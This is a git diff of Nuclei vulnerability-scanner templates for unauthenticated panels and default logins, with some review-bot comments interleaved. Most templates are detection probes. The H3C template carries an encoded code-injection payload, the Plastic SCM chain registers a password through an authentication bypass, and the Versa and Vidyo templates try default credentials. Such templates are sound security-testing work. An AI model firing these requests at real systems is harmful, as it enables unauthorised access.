@@ -3,8 +3,7 @@ info: name: Unauthenticated Alert Manager author: dhiyaneshDK severity: high - reference: - - https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22 tags: unauth,alertmanager requests: - method: GET diff --git a/poc/auth/unauthenticated-alert-manager-10892.yaml b/poc/auth/unauthenticated-alert-manager-10892.yaml deleted file mode 100644 index f4b978d825..0000000000 --- a/poc/auth/unauthenticated-alert-manager-10892.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: unauthenticated-alert-manager - -info: - name: Unauthenticated Alert Manager - author: dhiyaneshDK - severity: high - reference: https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22 - tags: unauth,alertmanager - -requests: - - method: GET - path: - - "{{BaseURL}}/#/alerts" - - matchers-condition: and - matchers: - - type: word - words: - - 'Alertmanager' - - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-frp-10895.yaml b/poc/auth/unauthenticated-frp-10895.yaml new file mode 100644 index 0000000000..a970101294 --- /dev/null +++ b/poc/auth/unauthenticated-frp-10895.yaml @@ -0,0 +1,21 @@ +id: unauthenticated-frp +info: + name: Unauthenticated FRP + author: pikpikcu + severity: info + reference: + - https://github.com/fatedier/frp/ + tags: frp,unauth,panel +requests: + - method: GET + path: + - "{{BaseURL}}/static/" + matchers-condition: and + matchers: + - type: word + words: + - "frps dashboard" + part: body + - type: status + status: + - 200 diff --git a/poc/auth/unauthenticated-frp-10896.yaml b/poc/auth/unauthenticated-frp-10896.yaml index 33cf66b2af..804da1cc21 100644 --- a/poc/auth/unauthenticated-frp-10896.yaml +++ b/poc/auth/unauthenticated-frp-10896.yaml @@ -1,4 +1,5 @@ id: unauthenticated-frp + info: name: Unauthenticated FRP author: pikpikcu 
@@ -6,16 +7,20 @@ info: tags: frp,unauth,panel reference: - https://github.com/fatedier/frp/ # vendor homepage + requests: - method: GET path: - "{{BaseURL}}/static/" + matchers-condition: and matchers: + - type: word words: - "frps dashboard" part: body + - type: status status: - 200 diff --git a/poc/auth/unauthenticated-frp-10897.yaml b/poc/auth/unauthenticated-frp-10897.yaml deleted file mode 100644 index 804da1cc21..0000000000 --- a/poc/auth/unauthenticated-frp-10897.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: unauthenticated-frp - -info: - name: Unauthenticated FRP - author: pikpikcu - severity: info - tags: frp,unauth,panel - reference: - - https://github.com/fatedier/frp/ # vendor homepage - -requests: - - method: GET - path: - - "{{BaseURL}}/static/" - - matchers-condition: and - matchers: - - - type: word - words: - - "frps dashboard" - part: body - - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-glowroot-10900.yaml b/poc/auth/unauthenticated-glowroot-10900.yaml index 7b724ea0ac..91ec9e0d7d 100644 --- a/poc/auth/unauthenticated-glowroot-10900.yaml +++ b/poc/auth/unauthenticated-glowroot-10900.yaml @@ -1,15 +1,20 @@ id: unauthenticated-glowroot + info: name: Glowroot Anonymous User author: pussycat0x severity: high description: Anonymous user access allows to understand the host internals - reference: https://www.shodan.io/search?query=http.title%3A%22Glowroot%22 + metadata: + max-request: 1 + shodan-query: http.title:"Glowroot" tags: misconfig,unauth,glowroot -requests: + +http: - method: GET path: - '{{BaseURL}}/backend/admin/users?username=anonymous' + matchers-condition: and matchers: - type: word 
@@ -18,10 +23,14 @@ requests: - '"Administrator"' - '"newPassword":""' condition: and + - type: word words: - "application/json" part: header + - type: status status: - 200 + +# digest: 490a00463044022019366c9de0a2a073adbbad6091fd850a52a5b2d56a5dd3ad2f0d39d9367bc01b02205cd93caca69d8f77cbf30f8643539c016d27c3a02de8520cbc25ede3a6a9e0e1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthenticated-glowroot-10902.yaml b/poc/auth/unauthenticated-glowroot-10902.yaml index 91ec9e0d7d..9660fba7a7 100644 --- a/poc/auth/unauthenticated-glowroot-10902.yaml +++ b/poc/auth/unauthenticated-glowroot-10902.yaml @@ -5,12 +5,10 @@ info: author: pussycat0x severity: high description: Anonymous user access allows to understand the host internals - metadata: - max-request: 1 - shodan-query: http.title:"Glowroot" + reference: https://www.shodan.io/search?query=http.title%3A%22Glowroot%22 tags: misconfig,unauth,glowroot -http: +requests: - method: GET path: - '{{BaseURL}}/backend/admin/users?username=anonymous' @@ -32,5 +30,3 @@ http: - type: status status: - 200 - -# digest: 490a00463044022019366c9de0a2a073adbbad6091fd850a52a5b2d56a5dd3ad2f0d39d9367bc01b02205cd93caca69d8f77cbf30f8643539c016d27c3a02de8520cbc25ede3a6a9e0e1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthenticated-influxdb-10903.yaml b/poc/auth/unauthenticated-influxdb-10903.yaml new file mode 100644 index 0000000000..4cd617572a --- /dev/null +++ b/poc/auth/unauthenticated-influxdb-10903.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-influxdb + +info: + name: Unauthentication InfluxDB Detection + author: pussycat0x + severity: high + metadata: + shodan-dork: InfluxDB + tags: unauth,db,influxdb,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"results":' + - '"name":"databases"' + condition: and + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/poc/auth/unauthenticated-influxdb.yaml b/poc/auth/unauthenticated-influxdb.yaml index 063d0eedc5..9725f2a6e7 100644 --- a/poc/auth/unauthenticated-influxdb.yaml +++ b/poc/auth/unauthenticated-influxdb.yaml @@ -1,4 +1,5 @@ id: unauthenticated-influxdb + info: name: Unauthentication InfluxDB Detection author: pussycat0x @@ -6,10 +7,12 @@ info: metadata: shodan-dork: InfluxDB tags: unauth,db,influxdb,misconfig + requests: - method: GET path: - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: - '"results":' - '"name":"databases"' condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/auth/unauthenticated-jenkins.yaml b/poc/auth/unauthenticated-jenkins.yaml index 1d4e284352..6461e48741 100644 --- a/poc/auth/unauthenticated-jenkins.yaml +++ b/poc/auth/unauthenticated-jenkins.yaml @@ -1,23 +1,27 @@ -id: unauthenticated-jenkins - -info: - name: Unauthenticated Jenkins Dashboard - author: dhiyaneshDK - severity: critical - tags: jenkins - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - Dashboard [Jenkins] - condition: and - - - type: status - status: - - 200 \ No newline at end of file +id: unauthenticated-jenkins + +info: + name: Unauthenticated Jenkins Dashboard + author: dhiyaneshDK + severity: high + metadata: + max-request: 1 + tags: jenkins + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - Dashboard [Jenkins] + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100811848566c0be01530924be02cd09bff4e6e70f54b2f9e5bf6d0f1818d8acd3a0220407f642622c3548af68ce0db4328b18a9d22cb1f916b7ed5c0e7ba7a000ac70e:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/auth/unauthenticated-mongo-express.yaml b/poc/auth/unauthenticated-mongo-express.yaml
new file mode 100644
index 0000000000..6396514361
--- /dev/null
+++ b/poc/auth/unauthenticated-mongo-express.yaml
@@ -0,0 +1,23 @@
+id: unauthenticated-mongo-express
+info:
+ name: Mongo Express Unauthenticated
+ author: dhiyaneshDK,b0rn2r00t
+ severity: high
+ reference: https://www.exploit-db.com/ghdb/5684
+ tags: mongo,unauth
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/mongo-express/'
+ - '{{BaseURL}}/db/admin/system.users'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Home - Mongo Express'
+ - 'system.users - Mongo Express'
+ condition: or
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/unauthenticated-nacos-access-10912.yaml b/poc/auth/unauthenticated-nacos-access-10912.yaml
new file mode 100644
index 0000000000..38b6ac2224
--- /dev/null
+++ b/poc/auth/unauthenticated-nacos-access-10912.yaml
@@ -0,0 +1,40 @@
+id: unauthenticated-nacos-access
+
+info:
+ name: Nacos 1.x - Authentication Bypass
+ author: taielab,pikpikcu
+ severity: critical
+ description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
+ reference:
+ - https://github.com/alibaba/nacos/issues/4593
+ - https://nacos.io/en-us/docs/auth.html
+ tags: nacos,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
+ - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
+ headers:
+ User-Agent: Nacos-Server
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Content-Type: application/json"
+ part: header
+
+ - type: regex
+ regex:
+ - '"username":'
+ - '"password":'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/05/20
diff --git a/poc/auth/unauthenticated-nacos-access-10915.yaml b/poc/auth/unauthenticated-nacos-access-10915.yaml
deleted file mode 100644
index a5c75638f1..0000000000
--- a/poc/auth/unauthenticated-nacos-access-10915.yaml
+++ /dev/null
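Review bot: The request block in `unauthenticated-nacos-access-10912.yaml` probes two paths but sets no `stop-at-first-match: true`, so a host that answers on both `/nacos/v1/auth/users` and `/v1/auth/users` is reported twice; the Airflow template added in this same commit sets that key for its two paths. The matched response is a user listing with `"username":` and `"password":` fields, so any scan output that stores response bodies should be handled as credential material. The `info` block also has no `classification`, unlike the other templates in this commit that carry the "Enhanced by mp" footer.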
@@ -1,35 +0,0 @@ -id: unauthenticated-nacos-access - -info: - name: Unauthenticated Nacos access v1.x - author: taielab,pikpikcu - severity: critical - reference: https://github.com/alibaba/nacos/issues/4593 - tags: nacos,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" - - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" - headers: - User-Agent: Nacos-Server - - matchers-condition: and - matchers: - - - type: word - words: - - "Content-Type: application/json" - part: header - - - type: regex - regex: - - '"username":' - - '"password":' - part: body - condition: and - - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-nacos-access.yaml b/poc/auth/unauthenticated-nacos-access.yaml index c98d9ff317..a5c75638f1 100644 --- a/poc/auth/unauthenticated-nacos-access.yaml +++ b/poc/auth/unauthenticated-nacos-access.yaml @@ -1,10 +1,12 @@ id: unauthenticated-nacos-access + info: name: Unauthenticated Nacos access v1.x author: taielab,pikpikcu severity: critical reference: https://github.com/alibaba/nacos/issues/4593 tags: nacos,unauth + requests: - method: GET path: @@ -12,18 +14,22 @@ requests: - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" headers: User-Agent: Nacos-Server + matchers-condition: and matchers: + - type: word words: - "Content-Type: application/json" part: header + - type: regex regex: - '"username":' - '"password":' part: body condition: and + - type: status status: - 200 diff --git a/poc/auth/unauthenticated-netdata.yaml b/poc/auth/unauthenticated-netdata.yaml index 0dc974421a..124b15aaad 100644 --- a/poc/auth/unauthenticated-netdata.yaml +++ b/poc/auth/unauthenticated-netdata.yaml 
@@ -1,26 +1,35 @@ id: unauthenticated-netdata + info: name: Unauthenticated Netdata author: dhiyaneshDk severity: medium reference: - https://github.com/netdata/netdata + metadata: + max-request: 1 tags: netdata,unauth,misconfig -requests: + +http: - method: GET path: - "{{BaseURL}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "view_update_every" - "dimensions" condition: and + - type: word words: - "application/json" part: header + +# digest: 4b0a00483046022100fc4242ebf2407e638e79765a478f330a7ef8474097273a381389cc4462e12a41022100a924453e95fb7f0d51fbc8dc4f797de4e8a286c27aa3202bdd2723b995633c36:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthenticated-popup-upload-10921.yaml b/poc/auth/unauthenticated-popup-upload-10921.yaml new file mode 100644 index 0000000000..5e5ec46c65 --- /dev/null +++ b/poc/auth/unauthenticated-popup-upload-10921.yaml @@ -0,0 +1,21 @@ +id: unauthenticated-popup-upload +info: + name: Unauthenticated Popup File Uploader + author: DhiyaneshDk + severity: info + reference: + - https://www.exploit-db.com/ghdb/6671 + tags: fileupload,upload +requests: + - method: GET + path: + - "{{BaseURL}}/RichWidgets/Popup_Upload.aspx" + matchers-condition: and + matchers: + - type: word + words: + - "Popup Upload" + part: body + - type: status + status: + - 200 diff --git a/poc/auth/unauthenticated-popup-upload-10922.yaml b/poc/auth/unauthenticated-popup-upload.yaml similarity index 100% rename from poc/auth/unauthenticated-popup-upload-10922.yaml rename to poc/auth/unauthenticated-popup-upload.yaml diff --git a/poc/auth/unauthenticated-prtg-10924.yaml b/poc/auth/unauthenticated-prtg-10924.yaml deleted file mode 100644 index 35a224af4b..0000000000 --- a/poc/auth/unauthenticated-prtg-10924.yaml +++ /dev/null 
@@ -1,20 +0,0 @@ -id: unauthenticated-prtg -info: - name: Unauthenticated PRTG Traffic Grapher - author: dhiyaneshDK - severity: high - reference: https://www.exploit-db.com/ghdb/5808 - tags: config,unauth,prtg -requests: - - method: GET - path: - - "{{BaseURL}}/sensorlist.htm" - matchers-condition: and - matchers: - - type: word - words: - - 'PRTG Traffic Grapher' - condition: and - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-prtg-10927.yaml b/poc/auth/unauthenticated-prtg-10927.yaml new file mode 100644 index 0000000000..1444ba22bb --- /dev/null +++ b/poc/auth/unauthenticated-prtg-10927.yaml @@ -0,0 +1,21 @@ +id: unauthenticated-prtg +info: + name: Unauthenticated PRTG Traffic Grapher + author: dhiyaneshDK + severity: high + reference: + - https://www.exploit-db.com/ghdb/5808 + tags: config,unauth,prtg +requests: + - method: GET + path: + - "{{BaseURL}}/sensorlist.htm" + matchers-condition: and + matchers: + - type: word + words: + - 'PRTG Traffic Grapher' + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/unauthenticated-zipkin.yaml b/poc/auth/unauthenticated-zipkin.yaml deleted file mode 100644 index 31ddfe3077..0000000000 --- a/poc/auth/unauthenticated-zipkin.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: unauthenticated-zipkin -info: - name: Unauthenticated Zipkin - author: dhiyaneshDk - severity: high - description: Unauthenticated access to Zipkin - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/config.json" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'application/json' - part: header - - type: word - words: - - environment - - defaultLookback - part: body - condition: and diff --git a/poc/auth/unauthenticated-zippkin.yaml b/poc/auth/unauthenticated-zippkin.yaml index 7452622ed4..984ff7a602 100644 --- a/poc/auth/unauthenticated-zippkin.yaml +++ b/poc/auth/unauthenticated-zippkin.yaml 
@@ -1,23 +1,28 @@ id: unauthenticated-zippkin + info: name: Unauthenticated Zippkin author: dhiyaneshDk severity: high description: Unauthenticated access to Zippkin tags: unauth + requests: - method: GET path: - "{{BaseURL}}/config.json" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'application/json' part: header + - type: word words: - environment diff --git a/poc/auth/unauthorized-h3csecparh-login-10948.yaml b/poc/auth/unauthorized-h3csecparh-login-10948.yaml deleted file mode 100644 index a4d8964e36..0000000000 --- a/poc/auth/unauthorized-h3csecparh-login-10948.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: unauthorized-h3csecparh-login - -info: - name: H3C Server - Unauthenticated Access - author: ritikchaddha - severity: high - description: H3C server was able to be accessed with no authentication requirements in place. - metadata: - verified: true - max-request: 1 - shodan-query: http.html:"H3C-SecPath-运维审计系统" - fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" - tags: h3c,default-login,unauth,misconfig - -http: - - method: GET - path: - - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "admin" - - "审计管理员" - - "错误的id" - condition: and - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100e19e26e61e30b3c2d1af7b9d75514aed59957ba6fbc93d093bba2c639bca2cb00221009542aa31b647b4d6d87b7fc500b996a088dae45909c130f74a4f6a6100f77971:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthorized-h3csecparh-login.yaml b/poc/auth/unauthorized-h3csecparh-login.yaml new file mode 100644 index 0000000000..c5b3c5cc9e --- /dev/null +++ b/poc/auth/unauthorized-h3csecparh-login.yaml 
@@ -0,0 +1,29 @@ +id: unauthorized-h3csecparh-login +info: + name: H3C Server - Unauthenticated Access + author: ritikchaddha + severity: high + description: H3C server was able to be accessed with no authentication requirements in place. + metadata: + verified: true + shodan-query: http.html:"H3C-SecPath-运维审计系统" + fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" + tags: h3c,default-login,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "admin" + - "审计管理员" + - "错误的id" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/21 diff --git a/poc/auth/unauthorized-hp-printer-10951.yaml b/poc/auth/unauthorized-hp-printer-10951.yaml new file mode 100644 index 0000000000..ef6191d59c --- /dev/null +++ b/poc/auth/unauthorized-hp-printer-10951.yaml @@ -0,0 +1,20 @@ +id: unauthorized-hp-printer +info: + name: Unauthorized HP Printer + author: pussycat0x + severity: high + tags: hp,iot,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/SSI/Auth/ip_snmp.htm" + matchers-condition: and + matchers: + - type: word + words: + - "HP" + - "

SNMP

" + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/unauthorized-plastic-scm-10956.yaml b/poc/auth/unauthorized-plastic-scm-10956.yaml index d004b07584..6d7ae5c71c 100644 --- a/poc/auth/unauthorized-plastic-scm-10956.yaml +++ b/poc/auth/unauthorized-plastic-scm-10956.yaml @@ -1,5 +1,4 @@ id: unauthorized-plastic-scm - info: name: Plastic Admin Console - Authentication Bypass author: DEENA @@ -9,13 +8,10 @@ info: - https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 classification: cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-score: 10.0 cwe-id: CWE-288 - metadata: - max-request: 3 - tags: plastic,misconfig,intrusive - -http: + tags: plastic +requests: - raw: - | GET /account/register HTTP/1.1 @@ -32,7 +28,7 @@ http: - | GET /configuration HTTP/1.1 {{Hostname}} - + cookie-reuse: true extractors: - type: regex part: body @@ -41,15 +37,14 @@ http: name: csrf regex: - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>' - matchers-condition: and matchers: - type: word words: - "Network - Plastic SCM" part: body - - type: status status: - 200 -# digest: 4b0a00483046022100bea1d6873fe7545d710a21e89f24e4e08aac08e44c85065970e57b7e658204b0022100c320ab0788b27b5733e65ab3ebf0c685204cfefb35b31625b0353ed4faa01433:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/05/23 diff --git a/poc/auth/unauthorized-plastic-scm-10957.yaml b/poc/auth/unauthorized-plastic-scm-10957.yaml deleted file mode 100644 index 6678abb0c6..0000000000 --- a/poc/auth/unauthorized-plastic-scm-10957.yaml +++ /dev/null 
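Review bot: The `tags:` line in `unauthorized-plastic-scm-10956.yaml` is cut from `plastic,misconfig,intrusive` to `plastic`, although the template is still a multi-request raw sequence that reuses cookies and extracts a `RequestVerificationToken`. The copy removed in this commit (`unauthorized-plastic-scm-10957.yaml`) shows the middle request is a POST to `/account/register` that submits a password, which changes state on the target. Keep the tag so operators can exclude the template from scans of production systems: `tags: plastic,misconfig,intrusive`. The request list lies between the visible hunks, so confirm the POST is still present in this revision.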
@@ -1,49 +0,0 @@ -id: unauthorized-plastic-scm - -info: - name: Unauthorized Access to Plastic Admin Console - author: DEENA - severity: critical - tags: plastic - reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 - -requests: - - raw: - - | - GET /account/register HTTP/1.1 - {{Hostname}} - - - | - POST /account/register HTTP/1.1 - Host: {{Hostname}} - Origin: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/account/register - Connection: close - - Password={{randstr}}&ConfirmPassword={{randstr}}&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false - - - | - GET /configuration HTTP/1.1 - {{Hostname}} - - cookie-reuse: true - extractors: - - type: regex - part: body - internal: true - group: 1 - name: csrf - regex: - - 'RequestVerificationToken" type="hidden" value="([A-Za-z0-9_-]+)" \/>' - - matchers-condition: and - matchers: - - type: word - words: - - "Network - Plastic SCM" - part: body - - - type: status - status: - - 200 diff --git a/poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml b/poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml new file mode 100644 index 0000000000..dd6e155d1a --- /dev/null +++ b/poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml @@ -0,0 +1,20 @@ +id: unauthorized-puppet-node-manager +info: + name: Pupet Node Manager + author: pussycat0x + severity: medium + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,misconfig +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'Nodes' + - type: status + status: + - 200 diff --git a/poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml b/poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml deleted file mode 100644 index 1e411a7ba4..0000000000 --- a/poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml +++ /dev/null 
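Review bot: The only content check in `unauthorized-puppet-node-manager-detect-10958.yaml` is the word `'Nodes'` on `{{BaseURL}}` together with status 200, which matches any page containing that word and reports it at `severity: medium`. Add a second, product-specific string under the same matcher with `condition: and` and `part: body`, taken from a real Puppet Node Manager page, before this is used for triage. The name is also misspelled: `name: Pupet Node Manager` should read `name: Puppet Node Manager`.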
@@ -1,24 +0,0 @@ -id: unauthorized-puppet-node-manager - -info: - name: Pupet Node Manager - author: pussycat0x - severity: medium - metadata: - fofa-dork: 'app="puppet-Node-Manager"' - tags: node,misconfig - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Nodes' - - - type: status - status: - - 200 diff --git a/poc/auth/unauthorized-puppet-node-manager-detect.yaml b/poc/auth/unauthorized-puppet-node-manager-detect.yaml index 40d26ed618..1e411a7ba4 100644 --- a/poc/auth/unauthorized-puppet-node-manager-detect.yaml +++ b/poc/auth/unauthorized-puppet-node-manager-detect.yaml @@ -1,15 +1,14 @@ id: unauthorized-puppet-node-manager info: - name: Puppet Node Manager - Unauthorized Access + name: Pupet Node Manager author: pussycat0x severity: medium metadata: - max-request: 1 - fofa-query: 'app="puppet-Node-Manager"' + fofa-dork: 'app="puppet-Node-Manager"' tags: node,misconfig -http: +requests: - method: GET path: - "{{BaseURL}}" @@ -23,5 +22,3 @@ http: - type: status status: - 200 - -# digest: 490a004630440220302dd4f63ddce12168518f0d398d2001b6a88e5bad6b2bdf2c1efa53a3e07bcc022001a50f5a5ae1e1b1c75ecf741ac85fdf3261bb0743c83b20804801e51399ebe7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/versa-default-login-11003.yaml b/poc/auth/versa-default-login-11003.yaml index 5c02c869b2..48d4d86354 100644 --- a/poc/auth/versa-default-login-11003.yaml +++ b/poc/auth/versa-default-login-11003.yaml @@ -1,5 +1,4 @@ id: versa-default-login - info: name: Versa Networks SD-WAN Application Default Login author: davidmckennirey @@ -11,11 +10,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - max-request: 2 tags: default-login,versa,sdwan - -http: +requests: - raw: - | GET /versa/login.html HTTP/1.1 
@@ -27,27 +23,26 @@ http: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&sso=systemRadio - attack: pitchfork payloads: user: - Administrator pass: - versa123 - + cookie-reuse: true + req-condition: true matchers-condition: and matchers: - type: dsl dsl: - 'status_code_2 == 302' - - "contains(tolower(header_2), 'jsessionid')" - - "contains(tolower(header_2), 'location: /versa/index.html')" + - "contains(tolower(all_headers_2), 'jsessionid')" + - "contains(tolower(all_headers_2), 'location: /versa/index.html')" condition: and - - type: dsl dsl: - - "contains(tolower(header_2), '/login?error=true')" - - "contains(tolower(header_2), '/login?tokenmissingerror=true')" + - "contains(tolower(all_headers_2), '/login?error=true')" + - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" negative: true -# digest: 4a0a0047304502201151a2811f7fa9cf424460e96e360bd688ded834b6e0de107bce9fa8acde9631022100c703c221458734a361b21a8cf8a7df830b49541da77ce8b7d04a57d22df72bc8:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/04/06 diff --git a/poc/auth/versa-default-login-11004.yaml b/poc/auth/versa-default-login-11004.yaml index aef0b2dbe9..5c02c869b2 100644 --- a/poc/auth/versa-default-login-11004.yaml +++ b/poc/auth/versa-default-login-11004.yaml @@ -1,11 +1,21 @@ id: versa-default-login + info: name: Versa Networks SD-WAN Application Default Login author: davidmckennirey severity: high - description: Searches for default admin credentials for the Versa Networks SD-WAN application. + description: Versa Networks SD-WAN application default admin credentials were discovered. + reference: + - https://versa-networks.com/products/sd-wan.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + max-request: 2 tags: default-login,versa,sdwan -requests: + +http: - raw: - | GET /versa/login.html HTTP/1.1 
@@ -17,24 +27,27 @@ requests: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&sso=systemRadio + attack: pitchfork payloads: user: - Administrator pass: - versa123 - cookie-reuse: true - req-condition: true + matchers-condition: and matchers: - type: dsl dsl: - 'status_code_2 == 302' - - "contains(tolower(all_headers_2), 'jsessionid')" - - "contains(tolower(all_headers_2), 'location: /versa/index.html')" + - "contains(tolower(header_2), 'jsessionid')" + - "contains(tolower(header_2), 'location: /versa/index.html')" condition: and + - type: dsl dsl: - - "contains(tolower(all_headers_2), '/login?error=true')" - - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" + - "contains(tolower(header_2), '/login?error=true')" + - "contains(tolower(header_2), '/login?tokenmissingerror=true')" negative: true + +# digest: 4a0a0047304502201151a2811f7fa9cf424460e96e360bd688ded834b6e0de107bce9fa8acde9631022100c703c221458734a361b21a8cf8a7df830b49541da77ce8b7d04a57d22df72bc8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/vidyo-default-login-11009.yaml b/poc/auth/vidyo-default-login-11009.yaml deleted file mode 100644 index 670142a941..0000000000 --- a/poc/auth/vidyo-default-login-11009.yaml +++ /dev/null 
@@ -1,52 +0,0 @@ -id: vidyo-default-login -info: - name: Vidyo Default Login - author: izn0u - severity: medium - description: test for default cred super:password - reference: https://support.vidyocloud.com/hc/en-us/articles/226265128 - tags: vidyo,default-login -requests: - - raw: - - | - GET /super/login.html?lang=en HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - | - POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Origin: {{BaseURL}} - Referer: {{RootURL}}/super/login.html?lang=en - Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en - - username={{username}}&password={{password}} - payloads: - username: - - super - password: - - password - attack: pitchfork - extractors: - - type: regex - name: csrf_tkn - group: 1 - part: body - internal: true - regex: - - 'csrf_tkn=([A-Za-z0-9.-]+)' - - type: kval - name: session - internal: true - part: header - kval: - - JSESSIONID - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/super/index.html" - - type: status - status: - - 302 diff --git a/poc/auth/vidyo-default-login.yaml b/poc/auth/vidyo-default-login-11010.yaml similarity index 100% rename from poc/auth/vidyo-default-login.yaml rename to poc/auth/vidyo-default-login-11010.yaml diff --git a/poc/auth/vigor-login-11020.yaml b/poc/auth/vigor-login-11020.yaml new file mode 100644 index 0000000000..8a6f091a0a --- /dev/null +++ b/poc/auth/vigor-login-11020.yaml @@ -0,0 +1,19 @@ +id: vigor-login +info: + name: Vigor Login Page + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6610 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/weblogin.htm' + matchers-condition: and + matchers: + - type: word + words: + - 'Vigor Login Page' + - type: status + status: + - 200 
